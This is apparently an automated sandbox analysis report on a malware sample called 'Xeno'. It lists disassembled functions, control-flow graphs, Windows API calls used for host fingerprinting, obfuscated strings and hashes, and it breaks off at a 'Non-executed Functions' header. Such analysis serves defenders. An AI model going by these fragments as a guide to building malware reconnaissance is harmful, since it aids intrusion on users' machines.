                            control_flow_graph 855 42d19a-42d1ca call 434ba0 call 407e80 860 42d1d0-42d1f5 855->860 860->860 861 42d1f7-42d1fe 860->861 862 42d200-42d204 861->862 863 42d21b-42d227 861->863 864 42d210-42d219 862->864 865 42d241-42d2a8 call 440310 GetPhysicallyInstalledSystemMemory 863->865 866 42d229-42d22b 863->866 864->863 864->864 871 42d2b0-42d30a 865->871 867 42d230-42d23d 866->867 867->867 869 42d23f 867->869 869->865 871->871 872 42d30c-42d345 call 41c5a0 871->872 875 42d350-42d364 872->875 875->875 876 42d366-42d36d 875->876 877 42d36f-42d377 876->877 878 42d38d 876->878 879 42d380-42d389 877->879 880 42d391-42d399 878->880 879->879 881 42d38b 879->881 882 42d3ab-42d3b8 880->882 883 42d39b-42d39f 880->883 881->880 885 42d3ba-42d3c1 882->885 886 42d3db-42d436 882->886 884 42d3a0-42d3a9 883->884 884->882 884->884 887 42d3d0-42d3d9 885->887 888 42d440-42d47b 886->888 887->886 887->887 888->888 889 42d47d-42d484 888->889 890 42d486-42d48f 889->890 891 42d49d 889->891 892 42d490-42d499 890->892 893 42d4a1-42d4ae 891->893 892->892 894 42d49b 892->894 895 42d4b0-42d4b7 893->895 896 42d4cb-42d585 893->896 894->893 897 42d4c0-42d4c9 895->897 897->896 897->897
                            APIs
                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D279
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InstalledMemoryPhysicallySystem
                            • String ID: V$]P>l$?O]
                            • API String ID: 3960555810-986093314
                            • Opcode ID: dec4f2b3383ebcc5747113049a67f21b24f36a02f8ef1ff504895b1b580e203f
                            • Instruction ID: efb6400d5338d83f01aaac8210cccbf9c494b2705186651a68766c945847a6df
                            • Opcode Fuzzy Hash: dec4f2b3383ebcc5747113049a67f21b24f36a02f8ef1ff504895b1b580e203f
                            • Instruction Fuzzy Hash: C2A1C47090C3A28BD735CF2994507ABBFE0AFD6300F14896ED8D997342D7798905CB96
                            Function 0043D0F0 Relevance: 4.0, Strings: 3, Instructions: 218COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 946 43d0f0-43d10c 947 43d155-43d166 946->947 948 43d10e-43d116 946->948 950 43d170-43d1a3 947->950 949 43d120-43d127 948->949 951 43d130-43d137 949->951 952 43d129-43d12c 949->952 950->950 953 43d1a5-43d1a9 950->953 951->947 955 43d139-43d14b call 43e7c0 951->955 952->949 954 43d12e 952->954 956 43d1af-43d1c7 call 43d0a0 953->956 957 43d30c-43d315 953->957 954->947 960 43d150-43d153 955->960 962 43d303-43d309 call 43d0c0 956->962 963 43d1cd-43d1d8 956->963 960->947 962->957 965 43d1e0-43d1e7 963->965 966 43d1e9-43d1ec 965->966 967 43d1f8-43d204 965->967 966->965 969 43d1ee-43d1f3 966->969 967->962 970 43d20a-43d21b call 43e7c0 967->970 969->962 972 43d220-43d225 970->972 973 43d2e6-43d2ec 972->973 974 43d22b-43d239 972->974 973->962 975 43d240-43d295 974->975 975->975 976 43d297-43d2a6 975->976 977 43d2b0-43d2b8 976->977 978 43d2c0-43d2cb 977->978 979 43d2d5-43d2d8 978->979 980 43d2cd-43d2d3 978->980 981 43d2da-43d2de 979->981 982 43d2ee-43d301 979->982 980->978 980->979 981->977 983 43d2e0-43d2e4 981->983 982->962 983->962
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: XQ1*$\Q1*$+
                            • API String ID: 0-3041387894
                            • Opcode ID: 34a1d91bb7c21f1186d8d0208b333f4450ba949009058a808821d030a3be046d
                            • Instruction ID: 5895d2294c971f8e2034238f20f2f79def80611cb6709990aaa7653370ceb720
                            • Opcode Fuzzy Hash: 34a1d91bb7c21f1186d8d0208b333f4450ba949009058a808821d030a3be046d
                            • Instruction Fuzzy Hash: A6516F71E043048BDB289F28DC41737B3D1E789724F15963EE896DB3D1E6359C018789
                            Function 004240A0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 991 4240a0-4240ef 992 4240f0-42411b 991->992 992->992 993 42411d-424169 RtlExpandEnvironmentStrings 992->993 994 424170-4241bc 993->994 994->994 995 4241be-4241c9 994->995 996 4243a3 995->996 997 424393-42439a 995->997 998 4241d0-4241d6 995->998 999 424221-42422d 995->999 1000 424215-42421e call 407e80 995->1000 1001 42422e-424237 995->1001 1002 42420d 995->1002 997->996 1006 4241d8-4241dd 998->1006 1007 4241df 998->1007 1000->999 1004 424240 1001->1004 1005 424239-42423e 1001->1005 1002->1000 1009 424247-424289 call 407e70 1004->1009 1005->1009 1010 4241e2-424206 call 407e70 RtlExpandEnvironmentStrings 1006->1010 1007->1010 1015 424290-424310 1009->1015 1010->996 1010->997 1010->999 1010->1000 1010->1001 1010->1002 1015->1015 1016 424316-424323 1015->1016 1017 424341-42434e 1016->1017 1018 424325-42432f 1016->1018 1020 424350-424354 1017->1020 1021 424371-42437f call 4419e0 1017->1021 1019 424330-42433f 1018->1019 1019->1017 1019->1019 1022 424360-42436f 1020->1022 1024 424384-42438c 1021->1024 1022->1021 1022->1022 1024->996 1024->997
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424151
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004241FB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID:
                            • API String ID: 237503144-0
                            • Opcode ID: 1759296bc14cd31225a9e57bae9c937f51eab8db115243470aa6628af3cbd0ca
                            • Instruction ID: 3f2aac39c58a3c97088cc2a5e0a6a6a04ed8071c8649e1c1d59fee9b7a36d9e8
                            • Opcode Fuzzy Hash: 1759296bc14cd31225a9e57bae9c937f51eab8db115243470aa6628af3cbd0ca
                            • Instruction Fuzzy Hash: 9E7124766183109FE710CF64E88175BB7E1FBD5304F09892DE8958B281DBB89D19CB86
                            Function 00427090 Relevance: 2.8, Strings: 2, Instructions: 292COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1026 427090-4270af 1027 4270b0-4270fb 1026->1027 1027->1027 1028 4270fd-42710a 1027->1028 1029 427154-427166 1028->1029 1030 42710c-427118 1028->1030 1031 427170-427193 1029->1031 1032 427120-427127 1030->1032 1031->1031 1033 427195-42719b 1031->1033 1034 427130-427137 1032->1034 1035 427129-42712c 1032->1035 1036 4271a1-4271bf call 43d0a0 1033->1036 1037 4272cf-4272d8 1033->1037 1034->1029 1039 427139-42714c call 43e7c0 1034->1039 1035->1032 1038 42712e 1035->1038 1044 4271c0-4271ec 1036->1044 1038->1029 1042 427151 1039->1042 1042->1029 1044->1044 1045 4271ee-4271f6 1044->1045 1046 4272c4 1045->1046 1047 4271fc-427208 1045->1047 1049 4272c6-4272cc call 43d0c0 1046->1049 1048 427210-427217 1047->1048 1051 427223-42722a 1048->1051 1052 427219-42721c 1048->1052 1049->1037 1051->1046 1055 427230-42723e call 43e7c0 1051->1055 1052->1048 1054 42721e 1052->1054 1054->1046 1057 427243-42724a 1055->1057 1057->1049 1058 42724c-427254 1057->1058 1059 427260-427275 1058->1059 1059->1059 1060 427277-427279 1059->1060 1061 427280-42728d call 407e70 1060->1061 1062 42727b 1060->1062 1065 4272a1-4272ab 1061->1065 1062->1061 1066 427290-42729f 1065->1066 1067 4272ad 1065->1067 1066->1065 1068 4272d9-4272dd 1066->1068 1069 4272b0-4272c0 1067->1069 1070 4272e3-4272ef 1068->1070 1071 4273af-4273b8 call 407e80 1068->1071 1069->1069 1072 4272c2 1069->1072 1073 4272f1-4272f8 1070->1073 1074 42732d-42736f call 407e70 call 408ae0 1070->1074 1071->1049 1072->1066 1076 42730c-427310 1073->1076 1088 427370-42738e 1074->1088 1079 427312-42731b 1076->1079 1080 427300 1076->1080 1084 427322-427326 1079->1084 1085 42731d-427320 1079->1085 1083 427301-42730a 1080->1083 1083->1074 1083->1076 1084->1083 1087 427328-42732b 1084->1087 1085->1083 1087->1083 1088->1088 1089 427390-4273ab call 408c40 call 407e80 1088->1089 1089->1071
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: 6016$b
                            • API String ID: 2994545307-864413770
                            • Opcode ID: 36b91a3189f51834b54774234e3f110313e053a56aaa5c52519ffc9606486525
                            • Instruction ID: 60cf8f15a9338521a9cead3a08613a9893755147c15dde7275904bfc6ceef081
                            • Opcode Fuzzy Hash: 36b91a3189f51834b54774234e3f110313e053a56aaa5c52519ffc9606486525
                            • Instruction Fuzzy Hash: 44817975B0C3208BD724DF65AC82B7B72A1EF91314F58857EE88557381E63D9C05C3AA
                            Function 00441450 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: QTUJ
                            • API String ID: 2994545307-1753559080
                            • Opcode ID: 994dc7504d864a574c716f2409e68564ac414f5aa7d1abaeb04d8d92da28722f
                            • Instruction ID: a6bfa4cb9190ef89da1edd16953e4f37e99d24ac172dc86594cb06b59e4c51cb
                            • Opcode Fuzzy Hash: 994dc7504d864a574c716f2409e68564ac414f5aa7d1abaeb04d8d92da28722f
                            • Instruction Fuzzy Hash: AC7138317043009BE7149E28D88157BB7E6EBD6364F29863EE8A9873A0DB34DC41C745
                            Function 0043E7C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LdrInitializeThunk.NTDLL(0044184E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043E7EE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                            Function 00440AB0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: @
                            • API String ID: 2994545307-2766056989
                            • Opcode ID: daf3b4b16eeee25848154daeb322f5852c497ad596691eb790aade3001df0475
                            • Instruction ID: 6f6c610495a8cf5583b4b78827772468214e1a405ea1080edbc4c8d404d54428
                            • Opcode Fuzzy Hash: daf3b4b16eeee25848154daeb322f5852c497ad596691eb790aade3001df0475
                            • Instruction Fuzzy Hash: 6B2126715043049BD3248F58D8C166BB7B4EFC6328F149A2DEA68473E0D375EC188B9A
                            Function 00440B90 Relevance: .3, Instructions: 331COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7fcc8bf6b42205e054cb748db94477577ebffda38a4dba77b302bc76d671e357
                            • Instruction ID: 640ba1ecf7e0c10ea4151d91a41ac0e0275706c2e5c36ad65190f80b20dac650
                            • Opcode Fuzzy Hash: 7fcc8bf6b42205e054cb748db94477577ebffda38a4dba77b302bc76d671e357
                            • Instruction Fuzzy Hash: 8F9128317043018BE718CF28C891AABB7E2EB99314F18893DEAD987391D739DC259755
                            Function 0040D190 Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e278b260ade7824607e9d206bf0c740a5cec33b05fb21e759bb6a9a0670049a
                            • Instruction ID: adab23953f27aebbb049cdd987770b1f90da96ac25c409cb70e848a80435e597
                            • Opcode Fuzzy Hash: 7e278b260ade7824607e9d206bf0c740a5cec33b05fb21e759bb6a9a0670049a
                            • Instruction Fuzzy Hash: DF31E3B9B416205BEA19B7126C02B6F31129F96318F84443EE94A272C3DF386E16C59F
                            Function 00409A5D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 984 409a5d-409a73 985 409a80-409aaa 984->985 985->985 986 409aac-409ae7 985->986 987 409af0-409b07 986->987 987->987 988 409b09-409b15 LoadLibraryExW call 43e1f0 987->988 990 409b1a-409b32 988->990
                            APIs
                            • LoadLibraryExW.KERNEL32(?,00000000,sxqv), ref: 00409B0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: sxqv
                            • API String ID: 1029625771-2372826424
                            • Opcode ID: 41c06041e0e38053a927aaef49ab051c74f3da675d7b257a0c37e5318a08c64d
                            • Instruction ID: 3c90811a730d97c9f70ff0ce875c621cd4626f5dabf1d0d0a982c9b16815e371
                            • Opcode Fuzzy Hash: 41c06041e0e38053a927aaef49ab051c74f3da675d7b257a0c37e5318a08c64d
                            • Instruction Fuzzy Hash: 5611027861D3804FD308DF7598A136BBBD2ABE7308F14953CD1C61B682CA349A07CB4A
                            Function 0040C733 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1025 40c733-40c77b CoInitializeSecurity * 2
                            APIs
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C745
                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C762
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeSecurity
                            • String ID:
                            • API String ID: 640775948-0
                            • Opcode ID: 67aaadf7b2c6effd7333e2589bfdeb0d24503ba00c0acad404c75bfdd4500518
                            • Instruction ID: ffbb97b94142b95e40fd922bbd7dc9ea267b421aa0676adc11c1963fdb964269
                            • Opcode Fuzzy Hash: 67aaadf7b2c6effd7333e2589bfdeb0d24503ba00c0acad404c75bfdd4500518
                            • Instruction Fuzzy Hash: 42E042393C83117AF6785B54AC57F1532156786F26F344328B7267E6E48AE07201450C
                            Function 0042E4AC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule
                            APIs
                            • GetComputerNameExA.KERNELBASE(00000005,3ACDD1F1,00000100), ref: 0042E5B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: ComputerName
                            • String ID:
                            • API String ID: 3545744682-0
                            • Opcode ID: 2539a9e9dd58733bd3f21d17fe2e52e1f39e62af0e6fa279351ba15a7e634051
                            • Instruction ID: fea5c588f6da4bb7086d61572e48acdd5d99848bfea760ffdd15ae91ae24ac3c
                            • Opcode Fuzzy Hash: 2539a9e9dd58733bd3f21d17fe2e52e1f39e62af0e6fa279351ba15a7e634051
                            • Instruction Fuzzy Hash: BE21683560C7E28AE724CB36D8903EBBBD19FC7314F08896DC8C997381DB7848068B52
                            Function 0042E4A6 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            • GetComputerNameExA.KERNELBASE(00000005,3ACDD1F1,00000100), ref: 0042E5B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: ComputerName
                            • String ID:
                            • API String ID: 3545744682-0
                            • Opcode ID: 8925056dd1b6fdef5a8cc41609ebd461170edc28ac5a7c513c5d7bebeb94d8be
                            • Instruction ID: 26532c79b15e5d0279687e1095ae653c396a650c36185ecb558b499c03813a00
                            • Opcode Fuzzy Hash: 8925056dd1b6fdef5a8cc41609ebd461170edc28ac5a7c513c5d7bebeb94d8be
                            • Instruction Fuzzy Hash: 58213A7561C7918BE724CB35C8903A77BD1AFC6314F14892DD8CD97340EB7848068B43
                            Function 00438236 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • GetUserDefaultUILanguage.KERNELBASE ref: 00438269
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: DefaultLanguageUser
                            • String ID:
                            • API String ID: 95929093-0
                            • Opcode ID: ab92d2045c8177a4efff73225cea8338981622d2990fe4a47dd2cec30961f5f7
                            • Instruction ID: 2e34f4c7f52991740cc3dbe09e53d2cd4b76e31f64b16223ebf34019563e4dae
                            • Opcode Fuzzy Hash: ab92d2045c8177a4efff73225cea8338981622d2990fe4a47dd2cec30961f5f7
                            • Instruction Fuzzy Hash: 6F11E6349097948FDB25CF3888907DEBBB1AF4A310F1442ECD89A97392DA384D41CF01
                            Function 0043E740 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000), ref: 0043E7A0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 980b3dac78a713323bf0f9bec34d0305644687b8d571e5a1f269da46dcaf4b9b
                            • Instruction ID: 3d6f13fefae88292eb4089c4d4d66f36609fe718f901965f6693123b5cd12a0c
                            • Opcode Fuzzy Hash: 980b3dac78a713323bf0f9bec34d0305644687b8d571e5a1f269da46dcaf4b9b
                            • Instruction Fuzzy Hash: CBF0F6BA905615EFD2102B26BC46F6B3A6CEF8AB69F011439B40067152DA29D81185BA
                            Function 0043E98B Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 0043EA70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: ForegroundWindow
                            • String ID:
                            • API String ID: 2020703349-0
                            • Opcode ID: 2036146d754ae92f21516d315a098be326d96b4be75a9a389b9b2afa63f75a35
                            • Instruction ID: 662c8fbebb6e15e14487a4a0d3994ac799f71c1ef069e298411c082116b7f70f
                            • Opcode Fuzzy Hash: 2036146d754ae92f21516d315a098be326d96b4be75a9a389b9b2afa63f75a35
                            • Instruction Fuzzy Hash: 7FF0A0BA915081CFE701DF65E86166B77A0FB5B310F0818B9D142D7392DA28A842EB59
                            Function 00434843 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: BlanketProxy
                            • String ID:
                            • API String ID: 3890896728-0
                            • Opcode ID: 9955c8f2bcb6e9f8e1275c62baf31b7d3665ec856aec3dde1247f3b00b4649f3
                            • Instruction ID: 4746e495412e1d37ff3d363b9c31ec30260a673917b22222d80bf90cc70a48fd
                            • Opcode Fuzzy Hash: 9955c8f2bcb6e9f8e1275c62baf31b7d3665ec856aec3dde1247f3b00b4649f3
                            • Instruction Fuzzy Hash: 0FF0F97461D3418FE315DF24C4A575FBBE4AB88708F00892DE88487392C7B99A498F82
                            Function 004308AD Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: BlanketProxy
                            • String ID:
                            • API String ID: 3890896728-0
                            • Opcode ID: 339aa804d34895b566fad6150f776b04d497913f157a49fb7abe7ecf72bed1a8
                            • Instruction ID: 331f64c32d35e4e16998dbad61f85cc240b661241795b965d68c18051cf29eb0
                            • Opcode Fuzzy Hash: 339aa804d34895b566fad6150f776b04d497913f157a49fb7abe7ecf72bed1a8
                            • Instruction Fuzzy Hash: 98F0F8706087018FE304DF24C5A871BBBE2BF89708F21C81CE0954B394CBB5AA09CF82
                            Function 0040C6E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C6F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            • Opcode ID: 2129cf03f5246ce104dac8e3b0bd67a57919508efd696816efe05e5989fbb1cb
                            • Instruction ID: 397c2700ae7b66a5aee633f039fc9f49dc266c58689241c67d6772894b5e7069
                            • Opcode Fuzzy Hash: 2129cf03f5246ce104dac8e3b0bd67a57919508efd696816efe05e5989fbb1cb
                            • Instruction Fuzzy Hash: 7CE0C226BE410417E3046B6CEC07F41361A83C2761F08C23AA210E66C4DD38A801826A
                            Function 0043D0C0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(?,00000000,00000000,00412A77), ref: 0043D0E0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d530fc94e3056614eaf0cf2985c41a64dba0245a0d64ecf818d25c00fd8e34f1
                            • Instruction ID: 000087db01947eb917a1f59d002a5db7393f8f104cbb5597166c8b4a11e00db3
                            • Opcode Fuzzy Hash: d530fc94e3056614eaf0cf2985c41a64dba0245a0d64ecf818d25c00fd8e34f1
                            • Instruction Fuzzy Hash: 24D01231445232EBC6502F18BC09BCB3B95DF4E725F0708A5F4416B0B5DB24DC91CAD8
                            Function 0043D0A0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(?,00000000,?,3E73B38A,0040873F,`Abc), ref: 0043D0B0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 06fc10c74ca97a524c8197303d623a6589d07f6638300fd272c5be366c2fedbb
                            • Instruction ID: 52af4fdc57eeab093beb84717f58dd41dd83a8c90dfe2c0cf9cc36f9c47ed945
                            • Opcode Fuzzy Hash: 06fc10c74ca97a524c8197303d623a6589d07f6638300fd272c5be366c2fedbb
                            • Instruction Fuzzy Hash: 6DC09B31445321ABC5502B15FC0DFCA7F55DF49351F114465B00567072C770AC41C6D8

                            Non-executed Functions

                            Function 00422EFD Relevance: 132.9, Strings: 106, Instructions: 424COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
